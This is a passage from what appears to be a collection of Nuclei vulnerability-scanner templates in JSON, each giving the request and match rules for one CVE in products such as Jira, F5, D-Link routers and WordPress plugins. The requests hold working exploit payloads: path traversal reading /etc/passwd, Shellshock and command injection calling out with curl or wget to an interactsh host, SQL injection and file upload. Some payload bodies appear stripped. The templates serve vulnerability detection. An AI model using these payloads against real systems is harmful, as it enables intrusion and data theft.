Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24442","info":{"name":"Wordpress Polls Widget < 1.5.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Forwarded-For: {{randstr}}\n\nquestion_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains_all(body, \"{\\\"answer_name\", \"vote\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce¶m=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\">","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45382","info":{"name":"D-Link - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ddns_check.ccp"],"body":"ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n# {\\n# field(arg: \\\"value\\\") {\\n# subField\\n# }\\n# }\\n#\\n# Keyboard shortcuts:\\n#\\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\\n#\\n# Run Query: Ctrl-Enter (or press the play button above)\\n#\\n# Auto Complete: Ctrl-Space (or just start typing)\\n#\\n\\n{\\n users {\\n nodes {\\n id\\n name\\n username\\n }\\n }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-33690","info":{"name":"SAP NetWeaver Development Infrastructure - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /tc.CBS.Appl/tcspseudo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Could not connect to the CBS"]}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["400 - Bad Request","<title>400 - Bad Request</title>"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n\n \n \n \n 2\n \n \n \n \n \n \n \n \n com.sun.corba.se.impl.activation.ServerTableEntry\n \n \n \n \n com.sun.corba.se.impl.activation.ServerTableEntry\n verify\n \n \n \n \n \n \n \n \n \n \n \n true\n \n \n 1\n \n \n UTF-8\n \n \n \n \n \n \n curl http://{{interactsh-url}}\n \n \n \n \n \n \n \n \n \n 3\n javax.xml.ws.binding.attachments.inbound\n javax.xml.ws.binding.attachments.inbound\n \n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"raw":["@timeout: 20s\nGET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\">\">)
    "],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29200","info":{"name":"Apache OFBiz < 17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n\n \n \n \n \n \n \n {{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"hex\")}}\n \n \n \n \n \n \n \n \n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"responseMessage\""]}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td>([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: "]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"matchers":[{"type":"dsl","dsl":["contains(body_2, \""]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["
    ","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;","{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29013","info":{"name":"Razer Sila Gaming Router - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ubus/"],"headers":{"Origin":"{{RootURL}}","Referer":"{{ROotURL}}","X-Requested-With":"XMLHttpRequest"},"body":"{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"30ebdc7dd1f519beb4b2175e9dd8463e\",\"file\",\"exec\",{\"command\":\"id\"}]}\n","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: 